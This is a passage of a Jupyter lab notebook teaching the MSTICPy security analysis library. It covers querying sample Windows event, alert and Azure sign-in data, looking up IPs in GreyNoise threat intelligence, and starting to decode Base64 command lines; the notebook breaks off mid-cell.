# MSTICPy Lab

This lab provides an interactive introduction to MSTICPy and its core features. It uses local datasets to provide a repeatable experience, however this follows the same pattern as if you were using data from a remote data store via one of MSTICPy's [Data Providers](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html)<br>


If you require more information during this lab more details can be found in the [MSTICPy documentation](https://msticpy.readthedocs.io/en/latest/).

## How to use this lab

The lab contains a number of interactive code examples as well as exercises to be completed. The exercises are entirely optional and can be skipped if wanted, however they provide a useful way to learn about using some of the core features of MSTICPy.<br>

To use the notebook simply select each cell below and either click the run cell button at the top or alternatively use the keyboard shortcut of Ctrl+Enter to execute each cell. Many cells will use the output of previous cells so its strongly recommended that cells be run in order.<br>

<div class="alert alert-block alert-info">
    <b>Note:</b> not all cells will have an output, do not be surprised if you do not see anything appear under a cell after running it. Also, some cells may take a while to run so please be a bit patient. For more help on running Jupyter notebooks please refer to <a href="https://jupyter.readthedocs.io/en/latest/running.html">this documentation.</a>
</div>

If you get stuck with any of the exercises in this lab you can check your answers in the [completed notebook here](https://github.com/microsoft/msticpy-lab/blob/main/MSTICPy_Lab_Completed.ipynb).<br>

In several places this notebook uses lookups to the external threat intelligence provider [GreyNoise](https://GreyNoise.io/). As this is an online service you may get different responses as that data is updated. Do not be surprised if you get no positive results when running the sections of this notebook where threat intelligence is used.

## Setup

MSTICpy includes a feature called [nbinit](https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html?highlight=nbinit#module-msticpy.nbtools.nbinit) that handles the process of installing and importing modules into a notebook environment. This was developed to allow for a clearer starting cell in notebooks and to avoid users being presented with a very large cell block at the top of a notebook.<br>

By passing the notebook namespace to init_notebook() this function handles the job of installing and importing core MSTICpy packages along with any others that might be needed by a notebook. When running this cell you may see some warnings - **this is to be expected and will not affect the rest of the lab** - they are simply show as we are not using a completed configuration in this scenario.

<div class="alert alert-block alert-info">
<b>Note:</b> When running this cell you may see some warnings - <b>this is to be expected and will not affect the rest of the lab</b> - they are simply show as we are not using a completed configuration in this scenario.
</div>

You must have msticpy installed to run this notebook (if using binder this lab has the package pre-installed for you):
```
!pip install --upgrade msticpy[timeseries, splunk, azsentinel]
```
MSTICpy versions > 1.0.1

The notebook also uses MSTIC Notebooklets (again pre-installed if using binder):
```
!pip install --upgrade msticnb
```

In [1]:
from msticpy.nbtools import nbinit

nbinit.init_notebook(namespace=globals())

ti = TILookup()

In [2]:
# We also need to load a couple of anwsers for one of the exercises (no peeking!)
import json

with open("data/answers.json") as f:
    answers = json.load(f)

## Data Acquisition
The starting point for many security analysis notebooks is ingesting data to conduct analysis or investigation of. MSTICpy has a number of [query providers](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html) to allow users to query and return data from a number of sources. Below we are using the Local Data query provider to return data from local files. This is useful for this lab but is also useful if analysis is relying on local data rather than a 'live' data source.<br> 

In order to provide a common interface layer between data and features in MSTICPy all data is returned in a Pandas [DataFrame](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html) DataFrame. As well as providing a consistent framework for other features to user it also allows for easy manipulation and analysis of the returned data using Pandas numerous features.

The first step in using a query provider is to initialize a `QueryProvider` and pass it the type of provider you want to use. Depending on the provider type you can also pass other required parameters. In the cell below we create a LocalData provider and pass it the location of where are local data files and their definitions are stored.<br>

Each provider contains a series of built-in queries. These are pre-defined queries that return a specific subset of data, for our LocalData provider this is a specific file, however for a 'live' data source such as Microsoft Sentinel these will execute queries against that data source and return the results.<br>

Once the query provider has been created we can use the `browse_queries` feature to interactively view the available queries.

In [3]:
# We start by loading a query provider for our `LocalData` source.
qry_prov = QueryProvider(
    data_environment="LocalData", data_paths=["./data"], query_paths=["./data"]
)
# We can then look at the queries built into a provider by default
qry_prov.browse_queries()

------------------------

Once a query has been selected you call it directly with `qry_prov.{query_group}.{query_name}` . You can also pass extra parameter to these queries where they have configurable elements (often things such as timeframes and specific entities to search for). In addition the query providers also allow you to execute a query defined as a string by calling `qry_prov.exec_query(QUERY_STRING)`<br>

The returned dataframe contains the query results and can be displayed and interacted with as with any other Pandas dataframe.

In [4]:
events = qry_prov.WindowsSecurity.list_host_events()
events.head()

,TenantId,TimeGenerated,SourceSystem,Account,AccountType,Computer,EventSourceName,Channel,Task,Level,EventData,EventID,Activity,PartitionKey,RowKey,StorageAccount,AzureDeploymentID,AzureTableName,AccessList,AccessMask,AccessReason,AccountDomain,AccountExpires,AccountName,AccountSessionIdentifier,...,TargetUserSid,TemplateContent,TemplateDSObjectFQDN,TemplateInternalName,TemplateOID,TemplateSchemaVersion,TemplateVersion,TokenElevationType,TransmittedServices,UserAccountControl,UserParameters,UserPrincipalName,UserWorkstations,VirtualAccount,VendorIds,Workstation,WorkstationName,SourceComputerId,EventOriginId,MG,TimeCollected,ManagementGroupName,Type,_ResourceId,EventProperties
0,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-11 08:40:22.537,OpsManager,WORKGROUP\MSTICAlertsWin1$,Machine,MSTICAlertsWin1,Microsoft-Windows-Security-Auditing,Security,13826,8,"<EventData xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">\r\n <Data Name=""Targe...",4799,4799 - A security-enabled local group membership was enumerated,,,,,,,,,,,,,...,,,,,,,,,,,,,,,,,,263a788b-6526-4cdc-8ed9-d79402fe4aa0,d0ec0118-9b6b-477e-ba9f-e4ead3665884,00000000-0000-0000-0000-000000000001,2019-02-11 08:40:40.387,AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0,SecurityEvent,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide...,"{'TargetUserName': 'Remote Desktop Users', 'TargetDomainName': 'Builtin', 'TargetSid': 'S-1-5-32..."
1,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-11 08:40:24.827,OpsManager,WORKGROUP\MSTICAlertsWin1$,Machine,MSTICAlertsWin1,Microsoft-Windows-Security-Auditing,Security,13826,8,"<EventData xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">\r\n <Data Name=""Targe...",4799,4799 - A security-enabled local group membership was enumerated,,,,,,,,,,,,,...,,,,,,,,,,,,,,,,,,263a788b-6526-4cdc-8ed9-d79402fe4aa0,5365f041-1345-4cd0-8fbb-41ccbaa16a39,00000000-0000-0000-0000-000000000001,2019-02-11 08:40:40.387,AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0,SecurityEvent,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide...,"{'TargetUserName': 'Administrators', 'TargetDomainName': 'Builtin', 'TargetSid': 'S-1-5-32-544',..."
2,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-11 08:40:24.827,OpsManager,WORKGROUP\MSTICAlertsWin1$,Machine,MSTICAlertsWin1,Microsoft-Windows-Security-Auditing,Security,13824,8,"<EventData xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">\r\n <Data Name=""Targe...",4798,4798 - A user's local group membership was enumerated.,,,,,,,,,,,,,...,,,,,,,,,,,,,,,,,,263a788b-6526-4cdc-8ed9-d79402fe4aa0,5333954d-9157-443c-9657-6ef390c73abb,00000000-0000-0000-0000-000000000001,2019-02-11 08:40:40.387,AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0,SecurityEvent,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide...,"{'TargetUserName': 'MSTICAdmin', 'TargetDomainName': 'MSTICAlertsWin1', 'TargetSid': 'S-1-5-21-9..."
3,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-11 08:40:24.833,OpsManager,WORKGROUP\MSTICAlertsWin1$,Machine,MSTICAlertsWin1,Microsoft-Windows-Security-Auditing,Security,13824,8,"<EventData xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">\r\n <Data Name=""Targe...",4798,4798 - A user's local group membership was enumerated.,,,,,,,,,,,,,...,,,,,,,,,,,,,,,,,,263a788b-6526-4cdc-8ed9-d79402fe4aa0,d2fded8a-e507-4017-aedd-cb6da6a2b624,00000000-0000-0000-0000-000000000001,2019-02-11 08:40:40.387,AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0,SecurityEvent,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide...,"{'TargetUserName': 'DefaultAccount', 'TargetDomainName': 'MSTICAlertsWin1', 'TargetSid': 'S-1-5-..."
4,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-11 08:40:24.833,OpsManager,WORKGROUP\MSTICAlertsWin1$,Machine,MSTICAlertsWin1,Microsoft-Windows-Security-Auditing,Security,13824,8,"<EventData xmlns=""http://schemas.microsoft.com/wi

<div class="alert alert-block alert-success">
<h3>Lab Exercise 1</h3>
In the cell below write code that uses the query provider created above (`qry_prov`) to get data relating to security alerts using a built-in query. You can use the query browser above to find the most suitable query to run.

<details>
    <summary>Hint:</summary>
    Queries relating to security alerts are part of the SecurityAlert query type.
</details>
</div>

In [5]:
# Get security alert data
alerts = qry_prov.SecurityAlert.list_alerts()
alerts.head()

,TenantId,TimeGenerated,AlertDisplayName,AlertName,Severity,Description,ProviderName,VendorName,VendorOriginalId,SystemAlertId,ResourceId,SourceComputerId,AlertType,ConfidenceLevel,ConfidenceScore,IsIncident,StartTimeUtc,EndTimeUtc,ProcessingEndTime,RemediationSteps,ExtendedProperties,Entities,SourceSystem,WorkspaceSubscriptionId,WorkspaceResourceGroup,ExtendedLinks,ProductName,ProductComponentName,AlertLink,Type,CompromisedEntity
0,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 02:29:07,SSH Anomalous Login ML,SSH Anomalous Login ML,Low,Anomalous login detected for SSH account,CustomAlertRule,Alert Rule,b0e143b8-4fa8-47bc-8bc1-9780c8b75541,f1ce87ca-8863-4a66-a0bd-a4d3776a7c64,,,CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698,Unknown,NaN,False,2019-02-18 01:49:02,2019-02-18 02:19:02,2019-02-18 02:29:07,,"{\r\n ""Alert Mode"": ""Aggregated"",\r\n ""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subsc...","[\r\n {\r\n ""$id"": ""3"",\r\n ""Address"": ""23.97.60.214"",\r\n ""Type"": ""ip"",\r\n ""Count...",Detection,40dcc8bf-0478-4f3b-b275-ed0a94f2c013,asihuntomsworkspacerg,,,,,SecurityAlert,
1,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 01:59:09,SSH Anomalous Login ML,SSH Anomalous Login ML,Low,Anomalous login detected for SSH account,CustomAlertRule,Alert Rule,4f454388-02d3-4ace-98bf-3a7e4fdef361,3968ef4e-b322-48ca-b297-e984aff8888d,,,CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698,Unknown,NaN,False,2019-02-18 01:19:02,2019-02-18 01:49:02,2019-02-18 01:59:09,,"{\r\n ""Alert Mode"": ""Aggregated"",\r\n ""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subsc...","[\r\n {\r\n ""$id"": ""3"",\r\n ""Address"": ""203.0.113.1"",\r\n ""Type"": ""ip"",\r\n ""Count""...",Detection,40dcc8bf-0478-4f3b-b275-ed0a94f2c013,asihuntomsworkspacerg,,,,,SecurityAlert,
2,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 02:29:07,SSH Anomalous Login ML,SSH Anomalous Login ML,Low,Anomalous login detected for SSH account,CustomAlertRule,Alert Rule,b0e143b8-4fa8-47bc-8bc1-9780c8b75541,3a78a119-abe9-4b5e-9786-300ddcfd9530,,,CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698,Unknown,NaN,False,2019-02-18 01:49:02,2019-02-18 02:19:02,2019-02-18 02:29:07,,"{\r\n ""Alert Mode"": ""Aggregated"",\r\n ""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subsc...","[\r\n {\r\n ""$id"": ""3"",\r\n ""Address"": ""23.97.60.214"",\r\n ""Type"": ""ip"",\r\n ""Count...",Detection,40dcc8bf-0478-4f3b-b275-ed0a94f2c013,asihuntomsworkspacerg,,,,,SecurityAlert,
3,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 02:43:27,SSH Anomalous Login ML,SSH Anomalous Login ML,Low,Anomalous login detected for SSH account,CustomAlertRule,Alert Rule,3f27593a-db5b-4ef4-bdc5-f6ce1915f496,8f622935-1422-41e6-b8f6-9119e681645c,,,CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698,Unknown,NaN,False,2019-02-18 01:33:19,2019-02-18 02:33:19,2019-02-18 02:43:27,,"{\r\n ""Alert Mode"": ""Aggregated"",\r\n ""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subsc...","[\r\n {\r\n ""$id"": ""3"",\r\n ""Address"": ""23.97.60.214"",\r\n ""Type"": ""ip"",\r\n ""Count...",Detection,40dcc8bf-0478-4f3b-b275-ed0a94f2c013,asihuntomsworkspacerg,,,,,SecurityAlert,
4,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 01:54:11,SSH Anomalous Login ML,SSH Anomalous Login ML,Low,Anomalous login detected for SSH account,CustomAlertRule,Alert Rule,3cbe0028-14e8-43ad-8dc2-77c96d8bb015,64a2b4af-c3d7-422c-820b-7f1feb664222,,,CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698,Unknown,NaN,False,2019-02-18 01:14:02,2019-02-18 01:44:02,2019-02-18 01:54:11,,"{\r\n ""Alert Mode"": ""Aggregated"",\r\n ""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subsc...","[\r\n {\r\n ""$id"": ""3"",\r\n ""Address"": ""203.0.113.1"",\r\n ""Type"": ""ip"",\r\n ""Count""...",Detection,40dcc8bf-0478-4f3b-b275-ed0a94f2c013,asihuntomsworkspacerg,,,,,SecurityAlert,


## Enrich Data
A key analysis step for security analysts is to take a dataset, extract relevant elements and enrich it with another dataset to help filter it.
A common example of this is taking IP addresses in log data and seeing if any of them appear in threat intelligence data.<br>

In the cells below we use MSTICPy's query provider to get sign in event data, and then look up the IPs those sign-ins have come from against a threat intelligence providers API using the [MSTICPy threat intelligence](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html) features. In this case we are using the [GreyNoise](https://GreyNoise.io/) provider.

In [6]:
# First we are going to use a built in query to get all of our signin data from our Windows host
data = qry_prov.WindowsSecurity.list_host_logons()
data.head()

,TenantId,Account,EventID,TimeGenerated,SourceComputerId,Computer,SubjectUserName,SubjectDomainName,SubjectUserSid,TargetUserName,TargetDomainName,TargetUserSid,TargetLogonId,LogonProcessName,LogonType,AuthenticationPackageName,Status,IpAddress,WorkstationName,TimeCreatedUtc
0,52b1ab41-869e-4138-9e40-2a4457f09bf0,NT AUTHORITY\SYSTEM,4624,2019-02-12 04:56:34.307,263a788b-6526-4cdc-8ed9-d79402fe4aa0,MSTICAlertsWin1,MSTICAlertsWin1$,WORKGROUP,S-1-5-18,SYSTEM,NT AUTHORITY,S-1-5-18,0x3e7,Advapi,5,Negotiate,,-,-,2019-02-12 04:56:34.307
1,52b1ab41-869e-4138-9e40-2a4457f09bf0,MSTICAlertsWin1\MSTICAdmin,4624,2019-02-12 04:37:25.340,263a788b-6526-4cdc-8ed9-d79402fe4aa0,MSTICAlertsWin1,-,-,S-1-0-0,MSTICAdmin,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,0xc90e957,NtLmSsp,3,NTLM,,131.107.147.209,IANHELLE-DEV17,2019-02-12 04:37:25.340
2,52b1ab41-869e-4138-9e40-2a4457f09bf0,MSTICAlertsWin1\MSTICAdmin,4624,2019-02-12 04:37:27.997,263a788b-6526-4cdc-8ed9-d79402fe4aa0,MSTICAlertsWin1,-,-,S-1-0-0,MSTICAdmin,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,0xc90ea44,NtLmSsp,3,NTLM,,131.107.147.209,IANHELLE-DEV17,2019-02-12 04:37:27.997
3,52b1ab41-869e-4138-9e40-2a4457f09bf0,MSTICAlertsWin1\MSTICAdmin,4624,2019-02-12 04:38:16.550,263a788b-6526-4cdc-8ed9-d79402fe4aa0,MSTICAlertsWin1,-,-,S-1-0-0,MSTICAdmin,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,0xc912d62,NtLmSsp,3,NTLM,,131.107.147.209,IANHELLE-DEV17,2019-02-12 04:38:16.550
4,52b1ab41-869e-4138-9e40-2a4457f09bf0,MSTICAlertsWin1\MSTICAdmin,4624,2019-02-12 04:38:21.370,263a788b-6526-4cdc-8ed9-d79402fe4aa0,MSTICAlertsWin1,-,-,S-1-0-0,MSTICAdmin,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,0xc913737,NtLmSsp,3,NTLM,,131.107.147.209,IANHELLE-DEV17,2019-02-12 04:38:21.370


MSTICPy includes a [Threat Intelligence (TI) lookup provider](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html) `TILookup` that allow for key indicators to be searched for in various different services. The provider can be configured to use a range of different providers, and queries can be specifically targeted at a provider if required.
MSTICPY current supports the following providers:
- VirusTotal
- AlienVault OTX
- IBM XForce
- GreyNoise
- Microsoft Sentinel Threat Intelligence

There is also support via the TI lookup provider to get the [Open Page Rank](https://www.domcop.com/openpagerank/what-is-openpagerank#:~:text=What%20Is%20Open%20PageRank%3F%20The%20Open%20PageRank%20initiative,has%20been%20collected%20over%20the%20last%207%20years) for a domain, and determine if an IP address is a [ToR]( https://www.torproject.org/) exit node.<br>

When instantiating a TI provider you can define the providers you want it to load, or you can let it search for a [MSTICPy config file](https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html) and take configuration from there - this is the approach we are taking in this lab.

In [7]:
# Next we need to load our TI providers
ti = TILookup()

`.loaded_providers` shows which providers have been loaded by the TI lookup provider.

In [8]:
# For this lab we are just using the GreyNoise provider
ti.loaded_providers

ChainMap({}, {'GreyNoise': <msticpy.sectools.tiproviders.greynoise.GreyNoise object at 0x000002C4980D6790>})

Once loaded you can use `lookup_ioc` to look up a single indicator, or `lookup_iocs` to lookup up a every value in a dataframe column.<br>

In this example we want to look up every IP address in our results dataframe, so we are going to use `lookup_iocs`, tell it to look up values in the "IpAddress" column, and use the GreyNoise service to do the lookups.<br>

Once we have results you can look either display the results statically or use `browse_results` to get an interactive view of the results.

In [9]:
from msticpy.nbtools import ti_browser

# Here we lookup each of the IP addresses in our dataset
results = ti.lookup_iocs(data, obs_col="IpAddress", providers=["GreyNoise"])
ti_browser.browse_results(results, severities=["information", "warning", "high"])

<div class="alert alert-block alert-success">
<h3>Lab Exercise 2</h3>
Now that you have seen how to return and enrich data complete the code in the following two cells to get a list of Azure AD sign in events and look the origin IP addresses against threat intelligence.<br>

Additional documentation on the threat intelligence provider can be found [here](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html)

<details>
    <summary>Hint:</summary>
    <ul>
        <li>Remember to pass `obs_col="IPAddress"` to `lookup_iocs` to get lookups on the correct column</li>
        <li>You can reuse the TI provider assigned to `ti` in the cells above</li>
    </ul>
</details>
</div>
    


In [10]:
# Use the query provider qry_prov to get Azure Azure signin data with the list_all_signins_geo query
logons_df = qry_prov.Azure.list_all_signins_geo()
logons_df.head()

,TenantId,SourceSystem,TimeGenerated,ResourceId,OperationName,OperationVersion,Category,ResultType,ResultSignature,ResultDescription,DurationMs,CorrelationId,Resource,ResourceGroup,ResourceProvider,Identity,Level,Location,AlternateSignInName,AppDisplayName,AppId,AuthenticationDetails,AuthenticationMethodsUsed,AuthenticationProcessingDetails,AuthenticationRequirement,...,NetworkLocationDetails,OriginalRequestId,ProcessingTimeInMilliseconds,RiskDetail,RiskEventTypes,RiskEventTypes_V2,RiskLevelAggregated,RiskLevelDuringSignIn,RiskState,ResourceDisplayName,ResourceIdentity,ServicePrincipalId,ServicePrincipalName,Status,TokenIssuerName,TokenIssuerType,UserAgent,UserDisplayName,UserId,UserPrincipalName,AADTenantId,Type,Result,Latitude,Longitude
0,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:04.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,NaN,0,c4b4ea3c-58ff-4e0e-b5b0-d2ea01cce380,Microsoft.aadiam,Microsoft.aadiam,NaN,CTFUser3,4,US,NaN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,[],NaN,[],singleFactorAuthentication,...,[],f05079ed-f820-4531-ab26-498b53af3800,366,none,[],[],none,none,none,Windows Azure Service Management API,797f4846-ba00-4fd7-ba43-dac1f8f63013,NaN,NaN,{'errorCode': 0},NaN,AzureAD,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404...",CTFUser3,acc49186-e946-4f6c-85af-669807da0e0f,ctfuser3@seccxp.ninja,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,SigninLogs,Sucess,42.997181,-86.848312
1,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:44.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,NaN,0,d5ef0f81-318f-4881-8df1-8415aab77d1a,Microsoft.aadiam,Microsoft.aadiam,NaN,Zack Von,4,US,NaN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,[],NaN,[],NaN,...,[],121dca00-0930-40fe-9b69-bbc1e33c3500,394,none,[],NaN,none,none,none,Windows Azure Service Management API,797f4846-ba00-4fd7-ba43-dac1f8f63013,NaN,NaN,{'errorCode': 0},NaN,AzureAD,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404...",Zack Von,2566a1a6-4d03-40d2-8836-6c8cf1ce517f,zvon@seccxp.ninja,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,SigninLogs,Sucess,48.614380,-121.110313
2,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:44.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,NaN,0,d5ef0f81-318f-4881-8df1-8415aab77d1a,Microsoft.aadiam,Microsoft.aadiam,NaN,Zack Von,4,US,NaN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,[],NaN,[],singleFactorAuthentication,...,[],121dca00-0930-40fe-9b69-bbc1e33c3500,394,none,[],[],none,none,none,Windows Azure Service Management API,797f4846-ba00-4fd7-ba43-dac1f8f63013,NaN,NaN,{'errorCode': 0},NaN,AzureAD,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404...",Zack Von,2566a1a6-4d03-40d2-8836-6c8cf1ce517f,zvon@seccxp.ninja,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,SigninLogs,Sucess,48.614380,-121.110313
3,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:04.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,NaN,0,c4b4ea3c-58ff-4e0e-b5b0-d2ea01cce380,Microsoft.aadiam,Microsoft.aadiam,NaN,CTFUser3,4,US,NaN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,[],NaN,[],NaN,...,[],f05079ed-f820-4531-ab26-498b53af3800,366,none,[],NaN,none,none,none,Windows Azure Service Management API,797f4846-ba00-4fd7-ba43-dac1f8f63013,NaN,NaN,{'errorCode': 0},NaN,AzureAD,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404...",CTFUser3,acc49186-e946-4f6c-85af-669807da0e0f,ctfuser3@seccxp.ninja,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,SigninLogs,Sucess,42.997181,-86.848312
4,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:35.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,NaN

In [11]:
# Lookup the IP addresses in the IPAddress column using the GreyNoise TI provider
tiresults = ti.lookup_iocs(logons_df, obs_col="IPAddress", providers=["GreyNoise"])
tiresults.head()

,Ioc,IocType,SafeIoc,QuerySubtype,Provider,Result,Severity,Details,RawResult,Reference,Status
0,24.13.212.221,ipv4,24.13.212.221,None,GreyNoise,False,information,Not found.,<Response [404 Not Found]>,https://api.greynoise.io/v3/community/24.13.212.221,404
1,24.16.133.227,ipv4,24.16.133.227,None,GreyNoise,False,information,Not found.,<Response [404 Not Found]>,https://api.greynoise.io/v3/community/24.16.133.227,404
2,24.16.133.227,ipv4,24.16.133.227,None,GreyNoise,False,information,Not found.,<Response [404 Not Found]>,https://api.greynoise.io/v3/community/24.16.133.227,404
3,24.13.212.221,ipv4,24.13.212.221,None,GreyNoise,False,information,Not found.,<Response [404 Not Found]>,https://api.greynoise.io/v3/community/24.13.212.221,404
4,73.226.223.252,ipv4,73.226.223.252,None,GreyNoise,False,information,Not found.,<Response [404 Not Found]>,https://api.greynoise.io/v3/community/73.226.223.252,404


## Extracting key data
Often when working with security related data the indicators you need are not as readily available as they were in the example above. Often, they can be encoded or otherwise obscured from human analysis. MSTICPy also includes tooling to help security analysts quickly decode this data for further analysis.<br>

In this section we are going to query our datasets for command line data, decode any Base64 encoding in the command lines using the [`base64` feature](https://msticpy.readthedocs.io/en/latest/data_analysis/Base64Unpack.html), and then extract known indicator types (such as IP addresses and domain names) from that data using the [`IoCExtract` feature](https://msticpy.readthedocs.io/en/latest/data_analysis/IoCExtract.html).

In [12]:
# Load command line data set
cmdl_data = qry_prov.WindowsSecurity.list_host_processes()
cmdl_data.head()

,TenantId,Account,EventID,TimeGenerated,Computer,SubjectUserSid,SubjectUserName,SubjectDomainName,SubjectLogonId,NewProcessId,NewProcessName,TokenElevationType,ProcessId,CommandLine,ParentProcessName,TargetLogonId,SourceComputerId,TimeCreatedUtc
0,52b1ab41-869e-4138-9e40-2a4457f09bf0,WORKGROUP\MSTICAlertsWin1$,4688,2/10/19 3:21 PM,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd78,C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe,%%1936,0x1994,"""CollectGuestLogs.exe"" -Mode:ga -FileName:C:\WindowsAzure\CollectGuestLogsTemp\710dc858-9c96-4df...",C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\WaAppAgent.exe,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,21:06.9
1,52b1ab41-869e-4138-9e40-2a4457f09bf0,WORKGROUP\MSTICAlertsWin1$,4688,2/10/19 3:21 PM,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x221c,C:\Windows\System32\conhost.exe,%%1936,0xd78,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,21:06.9
2,52b1ab41-869e-4138-9e40-2a4457f09bf0,WORKGROUP\MSTICAlertsWin1$,4688,2/10/19 2:15 PM,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x638,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF\DesiredStateCon...,%%1936,0xe24,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF/DesiredStateCo...",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,15:36.3
3,52b1ab41-869e-4138-9e40-2a4457f09bf0,WORKGROUP\MSTICAlertsWin1$,4688,2/10/19 2:15 PM,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x115c,C:\Windows\System32\conhost.exe,%%1936,0x638,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF\DesiredStateCon...,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,15:36.3
4,52b1ab41-869e-4138-9e40-2a4457f09bf0,WORKGROUP\MSTICAlertsWin1$,4688,2/10/19 3:48 PM,MSTICAlertsWin1,S-1-5-20,MSTICAlertsWin1$,WORKGROUP,0x3e4,0x2364,C:\Windows\System32\reg.exe,%%1936,0x1c24,"reg ""C:\diagnostics\WinBenignActivity.cmd"" -25563 /10689",C:\Windows\System32\cmd.exe,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,48:18.4


Now that we have some data in a DataFrame, we can use MSTICP's `mp_b64` Pandas access to call  `extract` and tell it to unpack data found in the 'CommandLine' column. This feature will look for Base64 patterns in that column, attempt to unpack any it finds and present us with the decoded output.<br>

`mp_b64.extract` provides an output of just elements relevant to the decoded string, to get some context on where this string was found we next join it back to the original dataset so that we can see the log event and the decoded string in the same dataset.

In [13]:
# Base64 decode
b64df = cmdl_data.head(1000).mp_b64.extract(column="CommandLine")
b64df["SourceIndex"] = pd.to_numeric(b64df["src_index"])
merged_df = (
